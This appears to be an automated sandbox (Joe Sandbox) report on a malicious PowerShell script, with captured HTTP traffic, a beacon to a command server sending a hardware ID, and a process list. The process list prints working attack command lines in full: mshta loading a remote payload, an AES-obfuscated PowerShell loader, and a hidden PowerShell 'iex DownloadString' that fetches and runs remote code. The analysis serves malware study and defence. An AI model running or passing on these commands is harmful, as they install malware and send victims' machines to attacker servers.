                                                                                                                                  2024-12-25 14:10:45 UTC15331OUTData Raw: c1 b3 98 87 df d8 79 94 6f 36 e2 f0 37 58 9c 71 f9 ff 8c 00 f2 90 0a 3c f2 db 10 dc 0f e2 0c a9 b9 7e 80 99 cb 07 4e c3 01 91 21 38 ee 51 d9 5a 07 bf 99 fd 98 0d c5 90 95 62 5e 94 2f 7d 76 2d e5 77 de 54 cb 08 04 ed e5 db 73 d6 fa 40 6b db 25 ef e7 71 5e cf ab 45 3c 3d 70 84 36 f1 e6 68 8d 06 2e c7 bd 26 59 2d ff f2 0f fc 40 98 24 ba f5 3e 85 b9 c8 9e f9 f2 d7 b6 76 2c a5 3c 4e c1 3c ef 1b ee 8c 66 7a a3 8f 32 e8 7c 42 0f 7c af 5c ab 24 12 c6 36 73 de 5d 1a b4 6a da c9 ef 41 53 4e 86 98 a4 2c 5f 6d 5f fc 5b 0c 47 24 a8 de 44 2c 4c 48 dc d6 8c 1e 35 95 cb ea 0f 43 e4 4d 2e 5f 07 db 9c ef 96 f6 5f e5 ab fb f8 73 40 d2 d2 08 73 e2 b4 f3 ae 27 a9 a8 ff 50 6c 5d 85 d2 b5 16 6a 06 95 e2 86 7e 23 94 8f 49 f2 39 93 f8 cc ec b4 d6 d5 15 c8 a9 1d 49 ab c2 6b 11 22
                                                                                                                                  Data Ascii: yo67Xq<~N!8QZb^/}v-wTs@k%q^E<=p6h.&Y-@$>v,<N<fz2|B|\$6s]jASN,_m_[G$D,LH5CM.__s@s'Pl]j~#I9Ik"
                                                                                                                                  2024-12-25 14:10:45 UTC15331OUTData Raw: 5e ff d5 ff fa 5b 9b 2a f7 88 9a 9a 42 49 30 54 1c 62 0a 31 66 73 f1 60 db 8e 7f b5 58 6a 5d 04 62 90 fe 3b 72 7d fe 25 48 9a f9 ef 10 eb dc 6c 0d 6f 40 23 21 01 c4 29 f2 ff 35 68 5a aa bf 4f d4 04 22 e0 30 86 77 72 cf ee 3e 20 bd 9f a6 8a c0 f1 f5 eb fb 64 1b 65 92 a1 ea d5 9d 75 fd 72 95 52 60 b1 f1 06 e4 2b fa 2c fd b8 9a 68 fb 47 f4 95 ec fb bc 3d 7f 01 45 30 ae 9e f0 f3 f8 9f b6 82 c8 3a e4 40 8b b7 fe 20 48 c1 65 c6 f8 f4 28 44 0b 47 07 c0 c7 16 54 8a 38 f2 eb ba 1a 9e b8 ab 06 4c c2 6e c2 03 4e 10 11 7c 98 8a 78 4d 2a d0 f2 c8 dd db a0 b3 25 7f 8a 54 3c 5f bb 86 2f 35 49 ef 49 45 8c 94 90 b9 4c 58 09 d8 3b c0 22 26 ee 23 79 73 0a 98 11 48 20 7b f5 78 32 bf 7e 23 5d 02 9a d0 ae 25 37 a8 d7 51 e2 57 91 de b7 12 82 89 97 94 9b e0 a5 12 98 77 56 3d 57
                                                                                                                                  Data Ascii: ^[*BI0Tb1fs`Xj]b;r}%Hlo@#!)5hZO"0wr> deurR`+,hG=E0:@ He(DGT8LnN|xM*%T<_/5IIELX;"&#ysH {x2~#]%7QWwV=W
                                                                                                                                  2024-12-25 14:10:45 UTC15331OUTData Raw: 37 72 d3 00 5d 8d 48 a5 a1 c9 fc 28 5e 25 e0 81 c5 ae 1f d3 b0 54 c1 3b e5 98 60 c1 53 28 1c 71 80 6b 78 70 10 e7 51 a2 f2 62 96 fd d0 e4 23 0f ec 3c f9 f6 cd eb 3f 74 dd 2c e7 87 d0 23 9d 17 e7 00 f1 0a 44 54 18 ca 47 01 d7 b6 82 27 4f e0 52 50 af ff df a9 b5 36 17 ac d5 db f7 eb 0d da 76 e1 fa f5 58 e4 9d d9 6a 5f 5e b3 e2 53 6e d5 5e 18 2f de 15 f9 85 e2 2c 51 3f 4b af 86 80 44 1c e4 36 b9 77 dd 8a 27 40 1e 38 7f 9f 23 45 d4 e0 86 e2 4a 51 bb f2 76 e9 61 bf 4b 08 bc 46 d3 3b 05 c8 ba 2c f5 15 21 8b 5a 52 aa 28 4e 04 bc 11 55 b7 04 99 0d 21 ae 80 30 54 30 37 2c 27 36 52 ad f5 8c a1 2f a4 fe 4f c4 8b 43 a4 16 80 59 44 b3 e3 f4 50 3b c1 c1 c5 9f ee e9 e8 f5 03 fb 77 6f c4 fd 4e a8 21 f3 73 2e 11 0a 9a 96 b2 7d 39 1e 4e ba 58 c2 a6 80 52 43 3c 4e c8 ea ab
                                                                                                                                  Data Ascii: 7r]H(^%T;`S(qkxpQb#<?t,#DTG'ORP6vXj_^Sn^/,Q?KD6w'@8#EJQvaKF;,!ZR(NU!0T07,'6R/OCYDP;woN!s.}9NXRC<N
                                                                                                                                  2024-12-25 14:10:45 UTC15331OUTData Raw: 11 df 3c 22 84 32 ae e0 00 0e 81 67 af 04 66 f5 b9 15 81 40 68 23 b4 90 e1 0f 83 fa a1 91 91 81 70 98 df ba 46 2f 3f c3 a2 a9 31 90 6e 4e fb 7d 82 6c 7a f4 78 78 46 84 76 05 57 c5 1b a1 b0 fa 56 c9 9a 6c 15 70 66 52 1e 22 ba f1 2d 0f 20 f1 88 40 e9 5b be 26 fe 1a 86 6d 91 9a 6b 95 3e 37 49 13 cd 07 24 85 27 9c 8c f5 b9 53 98 33 93 17 f7 af e7 0e a9 63 86 03 1f 0d 0e 07 1f 5b 50 ee 2e 62 b4 6a 8b d9 69 4b 35 2f 04 33 ae 1d 27 8b ad bf d6 b4 1d 96 6f 5d 94 b4 af 0f d3 10 6d 2b e7 84 71 53 04 05 46 82 30 20 18 03 63 6c 83 fe 5d 02 f4 91 05 23 31 60 1b 4d ab 3a 57 ec 14 83 09 47 a4 5b 84 e8 7b d9 35 53 3f 09 8d 4b 15 bc ce 79 1b 8f b6 3f 2f c0 5c 15 3e 68 17 aa ea b7 65 14 eb 98 8b f7 ff 56 51 fc 7f 5f 10 9c 8d 84 47 02 b8 44 45 c6 36 04 1f 53 65 9c ed 0f 95
                                                                                                                                  Data Ascii: <"2gf@h#pF/?1nN}lzxxFvWVlpfR"- @[&mk>7I$'S3c[P.bjiK5/3'o]m+qSF0 cl]#1`M:WG[{5S?Ky?/\>heVQ_GDE6Se
                                                                                                                                  2024-12-25 14:10:45 UTC15331OUTData Raw: e7 12 96 c2 d6 ba 40 37 87 90 f0 8c e4 c7 57 e2 7d 91 54 03 04 d6 48 c5 af 5b 86 cc af 2e eb 16 8c 21 25 10 a1 da cf 27 40 0c f7 74 41 26 e9 3c 8c 7c be 0b 07 bb 3c aa 07 cc 54 7c 64 79 bb c9 41 d2 39 c0 7e 3f 5b 9c b5 04 52 db 28 15 6b 81 b3 e0 34 98 72 57 14 03 9a 57 4c a9 3b 60 63 50 2b b3 72 e0 81 f2 dd cd 01 5d 0c 11 55 a1 26 e3 9e d7 8b 30 d9 94 31 d6 ad b2 b3 40 fe 0f 0a 98 93 36 ad 69 23 05 ed bb 8e f0 a0 cd 41 09 95 10 6d c2 d0 1c 07 0c e3 e1 16 24 b0 7c 04 77 89 82 dd 65 cb c2 f4 76 e3 5e 71 50 b6 79 7b 6f 00 0a 68 b0 9f 68 22 2a 0b b5 8a 08 d1 73 3a 25 19 50 df c1 f1 62 55 70 9a e1 fe 61 63 fd b0 e3 e0 46 d3 87 94 c3 e3 ec 47 95 29 2a ca d4 2c 83 3f 0a 7d 47 87 c2 7a 44 5b 0f a4 d7 87 51 a8 75 b8 4c db 1f 53 5a 6d 53 2c 1b de 3d b8 6e 2b 4a e8
                                                                                                                                  Data Ascii: @7W}TH[.!%'@tA&<|<T|dyA9~?[R(k4rWWL;`cP+r]U&01@6i#Am$|wev^qPy{ohh"*s:%PbUpacFG)*,?}GzD[QuLSZmS,=n+J
                                                                                                                                  2024-12-25 14:10:45 UTC15331OUTData Raw: 69 b1 45 16 7e 34 e1 02 53 da b0 4d 11 dc 41 49 70 68 ee 21 20 dd 9c 9a b6 7b fa d6 e5 ba e3 8a 32 e5 8d ba 1a a0 9b 27 08 bf f3 18 3d 8d a6 bf dd 18 b5 cc ed ef 1d e3 ff 6e 0b 7d 51 27 5c e7 0c 91 19 59 01 fc f7 cc 0d fb 91 a4 45 7e be 8f 30 7d de 3a 7c 4f c1 10 f7 2f 1c ef b8 2e 60 c7 28 23 7e 42 7c aa 57 90 6d 0b d8 df 65 89 40 a3 23 77 0f 89 9f 71 98 2b cd ea 52 43 d5 50 5a a0 3e 79 70 e8 23 2e e9 a0 97 a1 76 8f 62 9f 63 d9 8e d0 33 b2 a4 be 09 5c 7a 9d 6e e7 57 ce 50 f9 c1 48 a4 e5 18 a6 ea 01 e9 39 eb a7 d5 95 06 d2 34 2e 7f bb c6 f0 08 92 49 a2 b0 c2 3d 10 da 4d 54 08 45 44 81 13 83 62 b7 ee 5a 8c 1f 15 39 24 7e 74 f5 d9 7c 43 a8 02 c9 ab 49 bb c4 84 c2 0b 0d 5d be 7b f6 b3 2f 63 66 93 b7 96 a0 30 0a 97 41 fe 61 72 86 b3 fb 6e b0 75 73 42 6b 21 be
                                                                                                                                  Data Ascii: iE~4SMAIph! {2'=n}Q'\YE~0}:|O/.`(#~B|Wme@#wq+RCPZ>yp#.vbc3\znWPH94.I=MTEDbZ9$~t|CI]{/cf0AarnusBk!
                                                                                                                                  2024-12-25 14:10:45 UTC15331OUTData Raw: 75 7d 64 b6 93 41 14 00 e5 a5 e3 e5 e5 06 5e 71 00 1f bc a0 5d 1f 2e ed e8 c7 99 ca b8 0c 08 fd 7e c1 e9 6e c6 9f 75 db eb da 8d 8a d7 33 54 b8 32 e7 48 fa 5b f6 96 8b 5a 57 69 dc e0 0f c1 a2 5b ad 5c be 73 6c ed 98 39 24 25 b3 52 65 d3 9e 9d 3e 69 eb 7d 15 e8 d3 d2 8f 66 b4 86 e6 d3 d4 b9 09 c1 bb d2 a7 6c e0 38 f8 6f 4a ff b7 9e c1 9b 86 80 50 00 f5 e0 25 8d 6d 38 c2 c1 ce df d6 c6 3f d0 b3 83 36 5e 17 04 6d 8d 9d e4 54 31 0f ee 20 1f cb ef 62 73 7a 8d 05 62 94 32 07 df cb 01 ad 23 b4 eb 9f d3 72 15 5b 6e 07 68 3f 0e ff 7c c7 f8 96 16 98 2e 89 6a 40 54 7a 9f 38 12 84 89 b2 16 00 b7 50 68 de a5 53 ce 84 49 d1 61 57 29 99 5d 75 f9 5e dd 52 7f 93 3c a5 c6 04 4d ca 30 90 70 bd 01 d8 31 ee 4d fd 0e 90 27 1c 61 2f 0a a8 f9 72 ef 5a 57 95 bd 95 e3 75 5b b1 1b
                                                                                                                                  Data Ascii: u}dA^q].~nu3T2H[ZWi[\sl9$%Re>i}fl8oJP%m8?6^mT1 bszb2#r[nh?|.j@Tz8PhSIaW)]u^R<M0p1M'a/rZWu[
                                                                                                                                  2024-12-25 14:10:45 UTC15331OUTData Raw: cb e2 0e 1b c2 f5 2d c4 3d 07 b9 63 be a0 5e 9d d1 b7 10 b3 1e 06 d3 e0 d0 0b 8b e1 2a 7d f0 61 d9 96 09 2a 15 3b eb 4f 43 85 e1 20 49 d4 f9 d5 4a 9d 23 61 32 5b a3 81 65 03 dc 1a dd 91 44 42 47 1b e2 52 6f a1 1f df 45 21 90 d4 66 d2 78 7b dd d8 a9 29 30 55 66 4f 31 ca ec 9e 85 f0 86 c4 ea 5e e9 77 05 44 2f 51 61 2d ab be b0 a8 b0 49 dc 3b f3 36 cc 11 37 ad 2b 98 f3 50 ec e2 15 97 08 63 5e 95 7e 37 4b 2f d3 d1 5c 82 3f b7 1f 46 78 4c 27 c7 33 ba eb 37 6b f7 4e f0 1c bb 62 2a 8c 0a a5 ae cf 0c d1 77 c3 4a b3 bc 3a a5 d8 b2 f4 69 37 ed 0c 80 a3 c2 cc d6 bc e1 eb 7a 13 d9 01 f1 9b 56 ba ed d9 0c 29 ce 55 03 ea b5 36 42 57 0f db e3 28 56 57 e1 b2 aa 1e b8 a4 5d 98 36 98 ac 3a ce d4 1f 5f 3f 13 15 1a 20 32 20 94 ac f4 63 e6 a4 89 69 4d a7 c1 4a d8 7f 9b 1a 9e
                                                                                                                                  Data Ascii: -=c^*}a*;OC IJ#a2[eDBGRoE!fx{)0UfO1^wD/Qa-I;67+Pc^~7K/\?FxL'37kNb*wJ:i7zV)U6BW(VW]6:_? 2 ciMJ
                                                                                                                                  2024-12-25 14:10:45 UTC15331OUTData Raw: b1 dd b2 3f d9 e4 ea d6 8f 67 c2 1a e0 e4 ba 9d 3a ff 67 80 e3 6a 25 2c 11 57 c8 0b 74 d6 6e 7b dd ba eb 7c 94 fa 03 89 f6 ab bd f5 2e 49 0e fc 96 3b a5 8b 7b 5e 27 0e e1 b8 2a 01 55 d2 37 3f aa 24 bc c5 10 6d 6b 50 d8 41 e5 dd e8 63 7b 8d 60 47 48 b6 0a 1c ae bf 9e 16 e6 a6 d2 b8 db 84 f7 f4 e8 bb 4e 7c 5e d4 50 cc fc 55 b3 b4 0e f1 5b 44 a1 cf 0e d4 ae e4 d0 81 3b 72 1b f6 d7 d6 3e 8a e0 b9 2f e8 a2 34 8c e1 21 41 25 c5 04 cb 6c c1 d7 47 b5 3e 45 bf d9 64 1f 29 f6 80 b2 9d bc d4 a5 bd a8 14 17 ec dc 78 b1 f0 5d e7 e6 48 5e 16 86 e3 66 26 3d 8d 81 70 73 ae cd d8 f1 b5 b7 35 d1 47 b0 fa ad dc 4e 27 03 c5 b5 da 38 52 15 1f 3e 31 58 43 af 4d 6c 8e 46 18 36 f9 9b 45 f0 ae ae c8 c7 44 f6 c8 e7 85 35 b1 fc cb b3 4c 8d d1 80 bc 4e 35 e7 13 32 19 ec b5 fd 36 68
                                                                                                                                  Data Ascii: ?g:gj%,Wtn{|.I;{^'*U7?$mkPAc{`GHN|^PU[D;r>/4!A%lG>Ed)x]H^f&=ps5GN'8R>1XCMlF6ED5LN526h
                                                                                                                                  2024-12-25 14:10:48 UTC1131INHTTP/1.1 200 OK
                                                                                                                                  Date: Wed, 25 Dec 2024 14:10:48 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Set-Cookie: PHPSESSID=2n6kn58umhsbsapt60gut5m5ik; expires=Sun, 20 Apr 2025 07:57:26 GMT; Max-Age=9999999; path=/
                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tigvZU%2FFaFtXtfLgmQ0lGJIvSqckMyC4nhu6ZgJUWAagzHYCSmZM8t56zGlYiRtadNz1MqJBDQttuc4X396qKQEHVbx%2B8zpHfZqsh5eYmmlN9WH7LyknVPvOXOnspaQi337ysvSn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f796a9e1c06729f-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1955&rtt_var=743&sent=319&recv=599&lost=0&retrans=0&sent_bytes=2845&recv_bytes=573532&delivery_rate=1493606&cwnd=169&unsent_bytes=0&cid=fd15d1e2778ac860&ts=2268&x=0"


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  9192.168.2.449866104.21.112.14438032C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-25 14:10:49 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 83
                                                                                                                                  Host: hushedocenahu.click
                                                                                                                                  2024-12-25 14:10:49 UTC83OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 37 26 6a 3d 26 68 77 69 64 3d 38 37 35 45 38 33 36 43 32 36 37 33 34 32 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                  Data Ascii: act=get_message&ver=4.0&lid=yJEcaG--singl7&j=&hwid=875E836C267342A3AC8923850305D13E
                                                                                                                                  2024-12-25 14:10:50 UTC1129INHTTP/1.1 200 OK
                                                                                                                                  Date: Wed, 25 Dec 2024 14:10:50 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Set-Cookie: PHPSESSID=vl6bq6c345ac313g4n09fa8tsv; expires=Sun, 20 Apr 2025 07:57:28 GMT; Max-Age=9999999; path=/
                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AWTl45hkLBvU5pekjhfYc2Y2Ck5Y2LJHBbILZ%2FSUUWubrVqt6esFWWR%2BzVsZwdo0UV%2FZuIjyn1xREOEfzZ%2FIj971RHz1OzYIbbQidxij9Bj4ZlTnSDuM7bmw6qDmIRCb6%2FoBXFbv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f796ab4a87a424b-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1614&min_rtt=1601&rtt_var=609&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=986&delivery_rate=1823860&cwnd=248&unsent_bytes=0&cid=dd7c189375b15cea&ts=770&x=0"
                                                                                                                                  2024-12-25 14:10:50 UTC54INData Raw: 33 30 0d 0a 71 47 71 4b 76 38 43 76 43 6d 68 70 50 4c 48 59 37 38 79 4e 35 57 2b 45 52 46 4c 6b 33 46 49 32 30 4e 67 64 6c 48 64 7a 75 64 72 7a 4e 77 3d 3d 0d 0a
                                                                                                                                  Data Ascii: 30qGqKv8CvCmhpPLHY78yN5W+ERFLk3FI20NgdlHdzudrzNw==
                                                                                                                                  2024-12-25 14:10:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Click to jump to process

                                                                                                                                  Click to jump to process

                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                  Click to jump to process

                                                                                                                                  Target ID:0
                                                                                                                                  Start time:09:08:57
                                                                                                                                  Start date:25/12/2024
                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00000.ps1"
                                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                                  File size:452'608 bytes
                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:1
                                                                                                                                  Start time:09:08:58
                                                                                                                                  Start date:25/12/2024
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                  File size:862'208 bytes
                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:2
                                                                                                                                  Start time:09:08:59
                                                                                                                                  Start date:25/12/2024
                                                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Windows\system32\mshta.exe" https://scrutinycheck.cash/singl7.mp4
                                                                                                                                  Imagebase:0x7ff69ede0000
                                                                                                                                  File size:14'848 bytes
                                                                                                                                  MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:moderate
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:3
                                                                                                                                  Start time:09:09:03
                                                                                                                                  Start date:25/12/2024
                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                                                  File size:55'320 bytes
                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:4
                                                                                                                                  Start time:09:09:04
                                                                                                                                  Start date:25/12/2024
                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function eSNNy($MAvcZ){return -split ($MAvcZ -replace '..', '0x$& ')};$lqmB = eSNNy('5C3F827BAC65B5D2C8965D0BBCE1ED07B9B6786A8751F026D08EFD0A825F531A8D091C0ECDD11B3934B46C626B865735BAB41B512BE15DE11F5E12515F7078B31EE8399C0E805B1F986B48CD1FE4A4708FA30B93CA4F7E812CA54A8793D62D3598E2B95AF0842B9C9750010609AF477848F4D131B954661400575166055C03EF1B5DE596CF55C542063D3F91CE19CE97925E58F6C32246A890129F4332D50885100C3526774D0074EEC5D7A612D64456E89E2AAD35E8F4DCB634817B8F6E0AC4FA605341C50069355F250ADB57D33D199E78EDCF80294758E47CB522EDFFFE73CC1B919EF16AF41E32F5B6A9BF909AE30CEB1071E2D14015FB77F6298FF2B02FEBA7B2BEE205F03CF88FF6F6BEBEEC0309A6D27D56500B79ADD62DD9D50A9590F07C9425FF02C2062F0E3444952489CE539FE357B044D8F72560487A102CC157F9E4E5B39D9C8DEF45655607C7A2FDB595ECBD612595FE995C4B043F8955A8F51FB018D2638C4F3A04E4CE1F6F77607E28264761F8517127E32F9F8D159565861F352D53ED7157874F263F52A7E1025A408CACC8B208E7F7776300701055FD3D6C30CA49783C822471E5B37491DA64E22ECA5ACEAE2C26465A1465F8774B5536298C89DBC028CD0AE43DBABB7B1179BD528CA17B1C6D0B390408ECE7927FEAA32EA4FAF5B6249A55C0BB8FCE630BBE9577950A1C82CEB3F5B1CC3B4D16D0DD85009C2C1593600E9AD124BD3E71F96E9ECC581D41A94B73C3A20BF4550FA7E08728A080D7A6A09FF218A0A37CDF4EF3F6A50CCC9DDEE0D24287949B372601CA8769A11092428566941E5E81DC734A344A92E5B54939A7B808EA27414A69BECE50356ADA32AF76C66A7EED81FF79A3208EA6CA1E28D54700AB34FB6270B5B4EC13DA50EBF0B9BBAB023861142203272D6112A5A6D9726B68EF794031846478BC822C4C0391F73AD6DD169DCDF33D909E115BCFB9021A0D74ABB583032AC14EDAF563EB221F82DBE70815740F8F4F65B3993B4805F2F8DED176EF03650D5BA2D74E1919BECB701A86B2332083BFBE1C6D8903AB78E68721C77F780C3596EDC51E77');$jAMAa=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((eSNNy('49446F52676D7356434761614A6E6878')),[byte[]]::new(16)).TransformFinalBlock($lqmB,0,$lqmB.Length)); & $jAMAa.Substring(0,3) $jAMAa.Substring(129)
                                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                                  File size:452'608 bytes
                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:5
                                                                                                                                  Start time:09:09:05
                                                                                                                                  Start date:25/12/2024
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                  File size:862'208 bytes
                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:6
                                                                                                                                  Start time:09:09:05
                                                                                                                                  Start date:25/12/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/singl7.pst'))"
                                                                                                                                  Imagebase:0xc80000
                                                                                                                                  File size:433'152 bytes
                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:7
                                                                                                                                  Start time:09:09:06
                                                                                                                                  Start date:25/12/2024
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                  File size:862'208 bytes
                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:12
                                                                                                                                  Start time:09:10:30
                                                                                                                                  Start date:25/12/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                  Imagebase:0xc80000
                                                                                                                                  File size:433'152 bytes
                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Reset < >
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1708995412.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b7d0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 86edf138029f4b6df4f319f08bbe8afee401992aae041ce2c8b479a8aa907b9b
                                                                                                                                    • Instruction ID: 7d18de3127f3f1dd01fd625624dbb9d3bcbd9e505403495affb5961ee0d50b6a
                                                                                                                                    • Opcode Fuzzy Hash: 86edf138029f4b6df4f319f08bbe8afee401992aae041ce2c8b479a8aa907b9b
                                                                                                                                    • Instruction Fuzzy Hash: 4D01A73020CB0C4FD748EF0CE051AA5B3E0FB85360F10066DE58AC36A1DA32E882CB41
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000003.1800829494.000002059E1C1000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002059E1C1000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_3_2059e1c1000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
